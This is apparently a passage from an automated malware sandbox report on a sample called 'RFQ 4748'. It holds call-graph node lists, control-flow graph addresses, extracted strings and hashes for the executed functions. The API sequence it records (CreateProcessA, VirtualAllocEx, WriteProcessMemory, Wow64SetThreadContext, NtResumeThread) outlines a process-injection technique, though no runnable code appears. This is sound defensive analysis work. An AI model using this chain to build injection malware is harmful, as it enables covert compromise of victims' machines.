61005->61003 61006->61003 61010 6aae64f 61007->61010 61008 6aae69b 61008->60982 61009 6aae96f 61009->61008 61012 6ad9dfa VirtualProtect 61009->61012 61013 6ad9e00 VirtualProtect 61009->61013 61010->61008 61010->61009 61011 6aaf07a NtProtectVirtualMemory 61010->61011 61011->61009 61012->61009 61013->61009 61015 6aae6fc 61014->61015 61016 6aae7a4 61015->61016 61017 6aae96f 61015->61017 61019 6aaf07a NtProtectVirtualMemory 61015->61019 61016->60982 61017->61016 61018 6ad9e00 VirtualProtect 61017->61018 61020 6ad9dfa VirtualProtect 61017->61020 61018->61017 61019->61017 61020->61017 61024 6aae6e8 61021->61024 61022 6aae7a4 61022->60982 61023 6aae96f 61023->61022 61025 6ad9dfa VirtualProtect 61023->61025 61026 6ad9e00 VirtualProtect 61023->61026 61024->61022 61024->61023 61027 6aaf07a NtProtectVirtualMemory 61024->61027 61025->61023 61026->61023 61027->61023 61031 6aae696 61028->61031 61029 6aae69b 61029->60982 61030 6aae96f 61030->61029 61032 6ad9dfa VirtualProtect 61030->61032 61033 6ad9e00 VirtualProtect 61030->61033 61031->61029 61031->61030 61034 6aaf07a NtProtectVirtualMemory 61031->61034 61032->61030 61033->61030 61034->61030 61038 6aae78f 61035->61038 61036 6aae7a4 61036->60982 61037 6aae96f 61037->61036 61040 6ad9dfa VirtualProtect 61037->61040 61041 6ad9e00 VirtualProtect 61037->61041 61038->61036 61038->61037 61039 6aaf07a NtProtectVirtualMemory 61038->61039 61039->61037 61040->61037 61041->61037 61043 6aae7a4 61042->61043 61044 6aae8a7 61042->61044 61043->60982 61048 6aaf07a NtProtectVirtualMemory 61044->61048 61045 6aae96f 61045->61043 61046 6ad9dfa VirtualProtect 61045->61046 61047 6ad9e00 VirtualProtect 61045->61047 61046->61045 61047->61045 61048->61045 61049 6c57831 61050 6c5783b 61049->61050 61054 6adf838 61050->61054 61071 6adf848 61050->61071 61051 6c56ca2 61055 6adf85d 61054->61055 61064 6adf873 61055->61064 61088 5851525 61055->61088 61092 58516bb 61055->61092 61096 5850e7b 61055->61096 61100 5851419 61055->61100 61104 5850cde 61055->61104 61108 5851334 61055->61108 61112 5850d55 61055->61112 61116 58522aa 61055->61116 61120 5850d8b 61055->61120 61124 5852168 61055->61124 61129 58521ae 61055->61129 61133 5851fcc 61055->61133 61138 585152c 61055->61138 61143 5850dc0 61055->61143 61064->61051 61072 6adf85d 61071->61072 61073 5851525 2 API calls 61072->61073 61074 5850dc0 2 API calls 61072->61074 61075 585152c 2 API calls 61072->61075 61076 5851fcc 2 API calls 61072->61076 61077 6adf873 61072->61077 61078 58521ae 2 API calls 61072->61078 61079 5852168 2 API calls 61072->61079 61080 5850d8b 2 API calls 61072->61080 61081 58522aa 2 API calls 61072->61081 61082 5850d55 2 API calls 61072->61082 61083 5851334 2 API calls 61072->61083 61084 5850cde 2 API calls 61072->61084 61085 5851419 2 API calls 61072->61085 61086 5850e7b 2 API calls 61072->61086 61087 58516bb 2 API calls 61072->61087 61073->61077 61074->61077 61075->61077 61076->61077 61077->61051 61078->61077 61079->61077 61080->61077 61081->61077 61082->61077 61083->61077 61084->61077 61085->61077 61086->61077 61087->61077 61089 5850d5e 61088->61089 61147 58552e1 61089->61147 61152 58552f0 61089->61152 61093 5850d5e 61092->61093 61094 58552e1 2 API calls 61093->61094 61095 58552f0 2 API calls 61093->61095 61094->61093 61095->61093 61097 5850d5e 61096->61097 61098 58552e1 2 API calls 61097->61098 61099 58552f0 2 API calls 61097->61099 61098->61097 61099->61097 61101 5850d5e 61100->61101 61102 58552e1 2 API calls 61101->61102 61103 58552f0 2 API calls 61101->61103 61102->61101 61103->61101 61105 5850ce9 61104->61105 61106 58552e1 2 API calls 61105->61106 61107 58552f0 2 API calls 61105->61107 61106->61105 61107->61105 61109 5850d5e 61108->61109 61110 58552e1 2 API calls 61109->61110 61111 58552f0 2 API calls 61109->61111 61110->61109 61111->61109 61113 5850d5e 61112->61113 61114 58552e1 2 API calls 61113->61114 61115 58552f0 2 API calls 61113->61115 61114->61113 61115->61113 61117 5850d5e 61116->61117 61118 58552e1 2 API calls 61117->61118 61119 58552f0 2 API calls 61117->61119 61118->61117 61119->61117 61121 5850d5e 61120->61121 61121->61120 61122 58552e1 2 API calls 61121->61122 61123 58552f0 2 API calls 61121->61123 61122->61121 61123->61121 61125 5850d5e 61124->61125 61125->61124 61126 585175d 61125->61126 61127 58552e1 2 API calls 61125->61127 61128 58552f0 2 API calls 61125->61128 61127->61125 61128->61125 61130 5850d5e 61129->61130 61131 58552e1 2 API calls 61130->61131 61132 58552f0 2 API calls 61130->61132 61131->61130 61132->61130 61134 5850d5e 61133->61134 61135 585175d 61134->61135 61136 58552e1 2 API calls 61134->61136 61137 58552f0 2 API calls 61134->61137 61136->61134 61137->61134 61140 5850d5e 61138->61140 61139 585175d 61140->61139 61141 58552e1 2 API calls 61140->61141 61142 58552f0 2 API calls 61140->61142 61141->61140 61142->61140 61144 5850d5e 61143->61144 61145 58552e1 2 API calls 61144->61145 61146 58552f0 2 API calls 61144->61146 61145->61144 61146->61144 61148 58552f1 61147->61148 61157 6adb094 61148->61157 61161 6adb0a0 61148->61161 61153 5855305 61152->61153 61155 6adb094 CopyFileA 61153->61155 61156 6adb0a0 CopyFileA 61153->61156 61154 5855323 61154->61089 61155->61154 61156->61154 61158 6adb0a0 CopyFileA 61157->61158 61160 6adb1f7 61158->61160 61162 6adb0f5 CopyFileA 61161->61162 61164 6adb1f7 61162->61164 60750 6c56f29 60751 6c56f2f 60750->60751 60755 5855c09 60751->60755 60762 5855c18 60751->60762 60752 6c56f73 60756 5855c4a 60755->60756 60757 5855c12 60755->60757 60768 5856186 60757->60768 60772 5856060 60757->60772 60776 5856051 60757->60776 60758 5855c43 60758->60752 60763 5855c2d 60762->60763 60765 5856186 11 API calls 60763->60765 60766 5856051 11 API calls 60763->60766 60767 5856060 11 API calls 60763->60767 60764 5855c43 60764->60752 60765->60764 60766->60764 60767->60764 60769 58560b7 60768->60769 60770 58563c2 60769->60770 60780 58575b0 60769->60780 60770->60758 60774 585608a 60772->60774 60773 58563c2 60773->60758 60774->60773 60775 58575b0 11 API calls 60774->60775 60775->60774 60778 5856060 60776->60778 60777 58563c2 60777->60758 60778->60777 60779 58575b0 11 API calls 60778->60779 60779->60778 60781 58575d5 60780->60781 60786 5857876 60781->60786 60791 58579e7 60781->60791 60796 5857a02 60781->60796 60787 5857a03 60786->60787 60788 5857a2e 60787->60788 60801 5857de1 60787->60801 60814 5857df0 60787->60814 60792 58579fb 60791->60792 60794 5857de1 11 API calls 60792->60794 60795 5857df0 11 API calls 60792->60795 60793 5857a2e 60794->60793 60795->60793 60797 5857a08 60796->60797 60799 5857de1 11 API calls 60797->60799 60800 5857df0 11 API calls 60797->60800 60798 5857a2e 60799->60798 60800->60798 60802 5857df0 60801->60802 60827 5858e87 60802->60827 60833 58583eb 60802->60833 60838 58582a8 60802->60838 60844 5858689 60802->60844 60849 585870e 60802->60849 60854 585812e 60802->60854 60859 585880f 60802->60859 60864 5858b1f 60802->60864 60868 5858942 60802->60868 60873 5858fc0 60802->60873 60803 5857e27 60803->60788 60815 5857e05 60814->60815 60817 5858e87 2 API calls 60815->60817 60818 5858fc0 3 API calls 60815->60818 60819 5858942 2 API calls 60815->60819 60820 5858b1f 2 API calls 60815->60820 60821 585880f 2 API calls 60815->60821 60822 585812e 2 API calls 60815->60822 60823 585870e 2 API calls 60815->60823 60824 5858689 2 API calls 60815->60824 60825 58582a8 3 API calls 60815->60825 60826 58583eb 2 API calls 60815->60826 60816 5857e27 60816->60788 60817->60816 60818->60816 60819->60816 60820->60816 60821->60816 60822->60816 60823->60816 60824->60816 60825->60816 60826->60816 60828 5858edc 60827->60828 60829 5857ead 60827->60829 60879 585b20a 60828->60879 60884 585b258 60828->60884 60890 585b218 60828->60890 60834 5858413 60833->60834 60903 585b300 60834->60903 60908 585b2f0 60834->60908 60835 5857ead 60835->60803 60839 58582b2 60838->60839 60922 6ad9b2f 60839->60922 60927 6ad9bc0 60839->60927 60931 6ad9bb8 60839->60931 60840 5857ead 60845 58586a1 60844->60845 60935 58594f0 60845->60935 60939 58594e0 60845->60939 60846 58586b9 60850 5858730 60849->60850 60956 6ad9a08 60850->60956 60960 6ad9a10 60850->60960 60851 5857ead 60851->60803 60855 58583ed 60854->60855 60856 5857ead 60854->60856 60857 585b300 2 API calls 60855->60857 60858 585b2f0 2 API calls 60855->60858 60856->60803 60857->60856 60858->60856 60860 5858837 60859->60860 60862 6ad9a08 WriteProcessMemory 60860->60862 60863 6ad9a10 WriteProcessMemory 60860->60863 60861 5857ead 60862->60861 60863->60861 60964 585b520 60864->60964 60969 585b512 60864->60969 60865 5858b37 60869 585895f 60868->60869 60871 6ad9a08 WriteProcessMemory 60869->60871 60872 6ad9a10 WriteProcessMemory 60869->60872 60870 5857ead 60871->60870 60872->60870 60874 5857ead 60873->60874 60875 58582a8 60873->60875 60876 6ad9b2f NtResumeThread 60875->60876 60877 6ad9bb8 NtResumeThread 60875->60877 60878 6ad9bc0 NtResumeThread 60875->60878 60876->60874 60877->60874 60878->60874 60880 585b215 60879->60880 60895 6ad94e8 60880->60895 60899 6ad94f0 60880->60899 60881 585b246 60881->60829 60885 585b229 60884->60885 60887 585b25b 60884->60887 60888 6ad94e8 Wow64SetThreadContext 60885->60888 60889 6ad94f0 Wow64SetThreadContext 60885->60889 60886 585b246 60886->60829 60887->60829 60888->60886 60889->60886 60891 585b22d 60890->60891 60893 6ad94e8 Wow64SetThreadContext 60891->60893 60894 6ad94f0 Wow64SetThreadContext 60891->60894 60892 585b246 60892->60829 60893->60892 60894->60892 60896 6ad94f0 Wow64SetThreadContext 60895->60896 60898 6ad957d 60896->60898 60898->60881 60900 6ad9535 Wow64SetThreadContext 60899->60900 60902 6ad957d 60900->60902 60902->60881 60904 585b315 60903->60904 60913 6ad990a 60904->60913 60918 6ad9910 60904->60918 60905 585b337 60905->60835 60909 585b300 60908->60909 60911 6ad990a VirtualAllocEx 60909->60911 60912 6ad9910 VirtualAllocEx 60909->60912 60910 585b337 60910->60835 60911->60910 60912->60910 60914 6ad990e VirtualAllocEx 60913->60914 60915 6ad98e6 60913->60915 60917 6ad998d 60914->60917 60915->60905 60917->60905 60919 6ad9950 VirtualAllocEx 60918->60919 60921 6ad998d 60919->60921 60921->60905 60923 6ad9b3a 60922->60923 60924 6ad9bb7 60922->60924 60923->60840 60924->60923 60925 6ad9c15 NtResumeThread 60924->60925 60926 6ad9c3d 60925->60926 60926->60840 60928 6ad9c08 NtResumeThread 60927->60928 60930 6ad9c3d 60928->60930 60930->60840 60932 6ad9bc0 NtResumeThread 60931->60932 60934 6ad9c3d 60932->60934 60934->60840 60936 5859507 60935->60936 60937 5859529 60936->60937 60943 5859bd1 60936->60943 60937->60846 60940 58594f0 60939->60940 60941 5859529 60940->60941 60942 5859bd1 2 API calls 60940->60942 60941->60846 60942->60941 60947 6ad91e4 60943->60947 60952 6ad91f0 60943->60952 60944 5859c0a 60948 6ad9197 60947->60948 60949 6ad91eb CreateProcessA 60947->60949 60948->60944 60951 6ad93dc 60949->60951 60951->60944 60953 6ad9254 60952->60953 60953->60953 60954 6ad9394 CreateProcessA 60953->60954 60955 6ad93dc 60954->60955 60955->60944 60957 6ad9a10 WriteProcessMemory 60956->60957 60959 6ad9aaf 60957->60959 60959->60851 60961 6ad9a58 WriteProcessMemory 60960->60961 60963 6ad9aaf 60961->60963 60963->60851 60965 585b535 60964->60965 60967 6ad94e8 Wow64SetThreadContext 60965->60967 60968 6ad94f0 Wow64SetThreadContext 60965->60968 60966 585b54e 60966->60865 60967->60966 60968->60966 60970 585b595 60969->60970 60971 585b51a 60969->60971 60970->60865 60973 6ad94e8 Wow64SetThreadContext 60971->60973 60974 6ad94f0 Wow64SetThreadContext 60971->60974 60972 585b54e 60972->60865 60973->60972 60974->60972 60734 6ad3423 60735 6ad3447 60734->60735 60737 6ad4911 NtProtectVirtualMemory 60735->60737 60736 6ad3485 60737->60736

                                                              Executed Functions

                                                              Function 06C5C790 Relevance: 16.2, Strings: 12, Instructions: 1175COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                              • API String ID: 0-3443518476
                                                              • Opcode ID: 095c8af4a9153cfb185dc7bf8dbe022de8f6de743a00ab3813ef9c09f4037b98
                                                              • Instruction ID: 562aecc39d2a650c711ccbf6dc5a5aacd11fa7f87bcea8336f48285eabeb9973
                                                              • Opcode Fuzzy Hash: 095c8af4a9153cfb185dc7bf8dbe022de8f6de743a00ab3813ef9c09f4037b98
                                                              • Instruction Fuzzy Hash: F2B20834A00218CFDB54DFA9CC94AADB7B6FF88700F158599E905AB3A5CB70AD81CF54
                                                              Function 06C5CAB7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                              • API String ID: 0-324474496
                                                              • Opcode ID: bb446068b9a6a7ce6f2e222b53f3c3666b76919e9c2739aeabc4d6bce9b0cb21
                                                              • Instruction ID: 7f6d8000d784a1fa00f1a0141d2dcc1008ab1f9f8e3ae4db01a3ce583fa2dd07
                                                              • Opcode Fuzzy Hash: bb446068b9a6a7ce6f2e222b53f3c3666b76919e9c2739aeabc4d6bce9b0cb21
                                                              • Instruction Fuzzy Hash: 8522E874A00218CFDB54DF69CD94BA9B7B2FF88304F158199D90AAB3A5DB30AD81CF54
                                                              Function 012DB6E0 Relevance: 6.0, Strings: 4, Instructions: 956COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 632 12db6e0-12db701 633 12db708-12db7ef 632->633 634 12db703 632->634 636 12db7f5-12db936 call 12d7be8 633->636 637 12dbef1-12dbf19 633->637 634->633 683 12db93c-12db997 636->683 684 12dbeba-12dbee4 636->684 640 12dc595-12dc59e 637->640 642 12dc5a4-12dc5bb 640->642 643 12dbf27-12dbf31 640->643 645 12dbf38-12dc02c call 12d7be8 643->645 646 12dbf33 643->646 666 12dc02e-12dc03a 645->666 667 12dc056 645->667 646->645 668 12dc03c-12dc042 666->668 669 12dc044-12dc04a 666->669 670 12dc05c-12dc07c 667->670 672 12dc054 668->672 669->672 674 12dc0dc-12dc15c 670->674 675 12dc07e-12dc0d7 670->675 672->670 695 12dc15e-12dc1b1 674->695 696 12dc1b3-12dc1f6 call 12d7be8 674->696 687 12dc592 675->687 692 12db99c-12db9a7 683->692 693 12db999 683->693 697 12dbeee 684->697 698 12dbee6 684->698 687->640 694 12dbdcf-12dbdd5 692->694 693->692 699 12db9ac-12db9ca 694->699 700 12dbddb-12dbe57 call 12d63cc 694->700 727 12dc201-12dc20a 695->727 696->727 697->637 698->697 702 12db9cc-12db9d0 699->702 703 12dba21-12dba36 699->703 743 12dbea4-12dbeaa 700->743 702->703 706 12db9d2-12db9dd 702->706 708 12dba3d-12dba53 703->708 709 12dba38 703->709 710 12dba13-12dba19 706->710 714 12dba5a-12dba71 708->714 715 12dba55 708->715 709->708 718 12db9df-12db9e3 710->718 719 12dba1b-12dba1c 710->719 716 12dba78-12dba8e 714->716 717 12dba73 714->717 715->714 723 12dba95-12dba9c 716->723 724 12dba90 716->724 717->716 721 12db9e9-12dba01 718->721 722 12db9e5 718->722 726 12dba9f-12dbb0a 719->726 728 12dba08-12dba10 721->728 729 12dba03 721->729 722->721 723->726 724->723 730 12dbb0c-12dbb18 726->730 731 12dbb1e-12dbcd3 726->731 733 12dc26a-12dc279 727->733 728->710 729->728 730->731 741 12dbcd5-12dbcd9 731->741 742 12dbd37-12dbd4c 731->742 734 12dc20c-12dc234 733->734 735 12dc27b-12dc303 733->735 736 12dc23b-12dc264 734->736 737 12dc236 734->737 770 12dc42e-12dc43a 735->770 736->733 737->736 741->742 749 12dbcdb-12dbcea 741->749 747 12dbd4e 742->747 748 12dbd53-12dbd74 742->748 745 12dbeac-12dbeb2 743->745 746 12dbe59-12dbea1 743->746 745->684 746->743 747->748 750 12dbd7b-12dbd9a 748->750 751 12dbd76 748->751 753 12dbd29-12dbd2f 749->753 758 12dbd9c 750->758 759 12dbda1-12dbdc1 750->759 751->750 756 12dbcec-12dbcf0 753->756 757 12dbd31-12dbd32 753->757 760 12dbcfa-12dbd1b 756->760 761 12dbcf2-12dbcf6 756->761 764 12dbdcc 757->764 758->759 762 12dbdc8 759->762 763 12dbdc3 759->763 766 12dbd1d 760->766 767 12dbd22-12dbd26 760->767 761->760 762->764 763->762 764->694 766->767 767->753 772 12dc308-12dc311 770->772 773 12dc440-12dc48c 770->773 774 12dc31a-12dc422 772->774 775 12dc313 772->775 782 12dc48e-12dc4b2 773->782 783 12dc4b4-12dc4cf 773->783 784 12dc428 774->784 775->774 776 12dc38c-12dc3bd 775->776 777 12dc3bf-12dc3f0 775->777 778 12dc356-12dc387 775->778 779 12dc320-12dc351 775->779 776->784 777->784 778->784 779->784 786 12dc4d8-12dc55c 782->786 783->786 784->770 792 12dc563-12dc583 786->792 792->687
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$Te]q$paq$xb`q
                                                              • API String ID: 0-4160082283
                                                              • Opcode ID: 1ed479fef71b9643a52b848b875f2c6b97891b9913bd3a584a5c6e6aeacc9541
                                                              • Instruction ID: c3d04900ed8c9ab4f622154dee8432fe1bb05c076282b51fc9aa59828353f41d
                                                              • Opcode Fuzzy Hash: 1ed479fef71b9643a52b848b875f2c6b97891b9913bd3a584a5c6e6aeacc9541
                                                              • Instruction Fuzzy Hash: B0A29375A10228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40
                                                              Function 06AE0040 Relevance: 3.8, Strings: 2, Instructions: 1335COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1338 6ae0040-6ae006e 1339 6ae0075-6ae0197 1338->1339 1340 6ae0070 1338->1340 1344 6ae01bb-6ae01c7 1339->1344 1345 6ae0199-6ae01b5 call 6ae2bc1 1339->1345 1340->1339 1346 6ae01ce-6ae01d3 1344->1346 1347 6ae01c9 1344->1347 1345->1344 1348 6ae020b-6ae0254 1346->1348 1349 6ae01d5-6ae01e1 1346->1349 1347->1346 1360 6ae025b-6ae0520 1348->1360 1361 6ae0256 1348->1361 1351 6ae01e8-6ae0206 1349->1351 1352 6ae01e3 1349->1352 1353 6ae196f-6ae1975 1351->1353 1352->1351 1355 6ae1977-6ae1997 1353->1355 1356 6ae19a0 1353->1356 1355->1356 1359 6ae19a1 1356->1359 1359->1359 1386 6ae0f50-6ae0f5c 1360->1386 1361->1360 1387 6ae0525-6ae0531 1386->1387 1388 6ae0f62-6ae0f9a 1386->1388 1389 6ae0538-6ae065d 1387->1389 1390 6ae0533 1387->1390 1397 6ae1074-6ae107a 1388->1397 1425 6ae065f-6ae0697 1389->1425 1426 6ae069d-6ae0726 1389->1426 1390->1389 1398 6ae0f9f-6ae101c 1397->1398 1399 6ae1080-6ae10b8 1397->1399 1414 6ae101e-6ae1022 1398->1414 1415 6ae104f-6ae1071 1398->1415 1409 6ae1416-6ae141c 1399->1409 1412 6ae10bd-6ae12bf 1409->1412 1413 6ae1422-6ae146a 1409->1413 1506 6ae135e-6ae1362 1412->1506 1507 6ae12c5-6ae1359 1412->1507 1422 6ae146c-6ae14df 1413->1422 1423 6ae14e5-6ae14f1 1413->1423 1414->1415 1418 6ae1024-6ae104c 1414->1418 1415->1397 1418->1415 1422->1423 1427 6ae14f8-6ae1530 1423->1427 1425->1426 1453 6ae0728-6ae0730 1426->1453 1454 6ae0735-6ae07b9 1426->1454 1443 6ae1939-6ae193f 1427->1443 1446 6ae1535-6ae15b7 1443->1446 1447 6ae1945-6ae196d 1443->1447 1466 6ae15df-6ae15eb 1446->1466 1467 6ae15b9-6ae15d4 1446->1467 1447->1353 1456 6ae0f41-6ae0f4d 1453->1456 1479 6ae07bb-6ae07c3 1454->1479 1480 6ae07c8-6ae084c 1454->1480 1456->1386 1468 6ae15ed 1466->1468 1469 6ae15f2-6ae15fe 1466->1469 1467->1466 1468->1469 1471 6ae1600-6ae160c 1469->1471 1472 6ae1611-6ae1620 1469->1472 1476 6ae1920-6ae1936 1471->1476 1477 6ae1629-6ae1901 1472->1477 1478 6ae1622 1472->1478 1476->1443 1512 6ae190c-6ae1918 1477->1512 1478->1477 1481 6ae162f-6ae1698 1478->1481 1482 6ae169d-6ae1715 1478->1482 1483 6ae171a-6ae1783 1478->1483 1484 6ae1788-6ae17f1 1478->1484 1485 6ae17f6-6ae185e 1478->1485 1479->1456 1531 6ae084e-6ae0856 1480->1531 1532 6ae085b-6ae08df 1480->1532 1481->1512 1482->1512 1483->1512 1484->1512 1518 6ae18d2-6ae18d8 1485->1518 1514 6ae13bf-6ae13fc 1506->1514 1515 6ae1364-6ae13bd 1506->1515 1529 6ae13fd-6ae1413 1507->1529 1512->1476 1514->1529 1515->1529 1520 6ae18da-6ae18e4 1518->1520 1521 6ae1860-6ae18be 1518->1521 1520->1512 1537 6ae18c5-6ae18cf 1521->1537 1538 6ae18c0 1521->1538 1529->1409 1531->1456 1544 6ae08ee-6ae0972 1532->1544 1545 6ae08e1-6ae08e9 1532->1545 1537->1518 1538->1537 1551 6ae0974-6ae097c 1544->1551 1552 6ae0981-6ae0a05 1544->1552 1545->1456 1551->1456 1558 6ae0a07-6ae0a0f 1552->1558 1559 6ae0a14-6ae0a98 1552->1559 1558->1456 1565 6ae0a9a-6ae0aa2 1559->1565 1566 6ae0aa7-6ae0b2b 1559->1566 1565->1456 1572 6ae0b2d-6ae0b35 1566->1572 1573 6ae0b3a-6ae0bbe 1566->1573 1572->1456 1579 6ae0bcd-6ae0c51 1573->1579 1580 6ae0bc0-6ae0bc8 1573->1580 1586 6ae0c53-6ae0c5b 1579->1586 1587 6ae0c60-6ae0ce4 1579->1587 1580->1456 1586->1456 1593 6ae0ce6-6ae0cee 1587->1593 1594 6ae0cf3-6ae0d77 1587->1594 1593->1456 1600 6ae0d79-6ae0d81 1594->1600 1601 6ae0d86-6ae0e0a 1594->1601 1600->1456 1607 6ae0e0c-6ae0e14 1601->1607 1608 6ae0e19-6ae0e9d 1601->1608 1607->1456 1614 6ae0e9f-6ae0ea7 1608->1614 1615 6ae0eac-6ae0f30 1608->1615 1614->1456 1621 6ae0f3c-6ae0f3e 1615->1621 1622 6ae0f32-6ae0f3a 1615->1622 1621->1456 1622->1456
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2$$]q
                                                              • API String ID: 0-351713980
                                                              • Opcode ID: ef66c1c2c94cc3be1c84cf86c6e4055e4c1591f706b133756efbd0de0e02103f
                                                              • Instruction ID: c971cc046701b45819b58f78270136f11308135a4c29ab03749afc63650c9d1a
                                                              • Opcode Fuzzy Hash: ef66c1c2c94cc3be1c84cf86c6e4055e4c1591f706b133756efbd0de0e02103f
                                                              • Instruction Fuzzy Hash: 3DE2C578E01228CFCB64EF69D984B9AB7B6FB89301F1081EAD549A7354DB345E81CF50
                                                              Function 06AD8778 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 222nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1624 6ad8778-6ad8779 1625 6ad877b-6ad8816 NtProtectVirtualMemory 1624->1625 1626 6ad8727-6ad873d 1624->1626 1643 6ad881f-6ad8844 1625->1643 1644 6ad8818-6ad881e 1625->1644 1627 6ad873f 1626->1627 1628 6ad8742-6ad8746 1626->1628 1627->1628 1630 6ad874c-6ad8752 1628->1630 1631 6ad8559-6ad855f 1628->1631 1630->1631 1632 6ad8568-6ad8569 1631->1632 1633 6ad8561 1631->1633 1635 6ad856e-6ad8577 1632->1635 1639 6ad8663-6ad866a 1632->1639 1633->1635 1636 6ad86ab-6ad8726 call 6ad7058 1633->1636 1637 6ad857a-6ad865e 1633->1637 1638 6ad86a5-6ad86a6 1633->1638 1633->1639 1636->1626 1637->1631 1638->1635 1640 6ad866c 1639->1640 1641 6ad8671-6ad8680 1639->1641 1640->1641 1645 6ad868f-6ad86a0 1641->1645 1646 6ad8682-6ad8685 1641->1646 1644->1643 1645->1631 1646->1645
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06AD8809
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID: NnLH
                                                              • API String ID: 2706961497-1007542163
                                                              • Opcode ID: 831fd314cb6184471967d7dc3738be9e30c3d9c121a0ca5740486e23a4bd76ed
                                                              • Instruction ID: e07ee5e249b58d947cf4d7a6ff3beb96b886d4e6a5e3ff9711616bb7e1738b7d
                                                              • Opcode Fuzzy Hash: 831fd314cb6184471967d7dc3738be9e30c3d9c121a0ca5740486e23a4bd76ed
                                                              • Instruction Fuzzy Hash: A89109B4E01209DFCB44DFA9D980AEEBBF5FF49300F108469E50AAB354DB34A945CB90
                                                              Function 06AD5160 Relevance: 3.1, Strings: 2, Instructions: 632COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1667 6ad5160-6ad5181 1668 6ad5188-6ad5203 call 6ad5d18 1667->1668 1669 6ad5183 1667->1669 1674 6ad5209-6ad5246 call 6ad27a8 1668->1674 1669->1668 1677 6ad5248-6ad5253 1674->1677 1678 6ad5255 1674->1678 1679 6ad525f-6ad537a call 6ad19f8 call 6ad1720 1677->1679 1678->1679 1692 6ad538c-6ad53b7 1679->1692 1693 6ad537c-6ad5382 1679->1693 1694 6ad5bf6-6ad5c12 1692->1694 1693->1692 1695 6ad53bc-6ad553a call 6ad19f8 call 6ad1720 1694->1695 1696 6ad5c18-6ad5c33 1694->1696 1709 6ad554c-6ad570c call 6ad19f8 call 6ad1720 1695->1709 1710 6ad553c-6ad5542 1695->1710 1724 6ad570e-6ad5712 1709->1724 1725 6ad5771-6ad577b 1709->1725 1710->1709 1727 6ad571a-6ad576c call 6ad19f8 call 6ad1720 1724->1727 1728 6ad5714-6ad5715 1724->1728 1726 6ad59d8-6ad59f7 1725->1726 1729 6ad59fd-6ad5a27 call 6ad2480 1726->1729 1730 6ad5780-6ad58e1 call 6ad19f8 call 6ad1720 1726->1730 1731 6ad5a7d-6ad5ae8 1727->1731 1728->1731 1741 6ad5a29-6ad5a77 call 6ad19f8 call 6ad1720 1729->1741 1742 6ad5a7a-6ad5a7b 1729->1742 1770 6ad58e7-6ad59ce call 6ad19f8 call 6ad1720 1730->1770 1771 6ad59d1-6ad59d2 1730->1771 1753 6ad5afa-6ad5b42 1731->1753 1754 6ad5aea-6ad5af0 1731->1754 1741->1742 1742->1731 1756 6ad5bde-6ad5bf3 1753->1756 1757 6ad5b48-6ad5bdd call 6ad19f8 call 6ad1720 1753->1757 1754->1753 1756->1694 1757->1756 1770->1771 1771->1726
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: fbq$8
                                                              • API String ID: 0-3186246319
                                                              • Opcode ID: 2b5c1f6764991538a8283a5ca3ef98f4960c3aa5ed37271fe50357cab3d2b9f8
                                                              • Instruction ID: 0b8d625892130f71b43d1fd4c2cdb9b10ed2f8edc5f103f0bc01ef6a431cf338
                                                              • Opcode Fuzzy Hash: 2b5c1f6764991538a8283a5ca3ef98f4960c3aa5ed37271fe50357cab3d2b9f8
                                                              • Instruction Fuzzy Hash: B862E775E002299FDB64EF69C894AD9B7B1FF89300F1082EAD549A7355DB30AE81CF50
                                                              Function 06C581A0 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
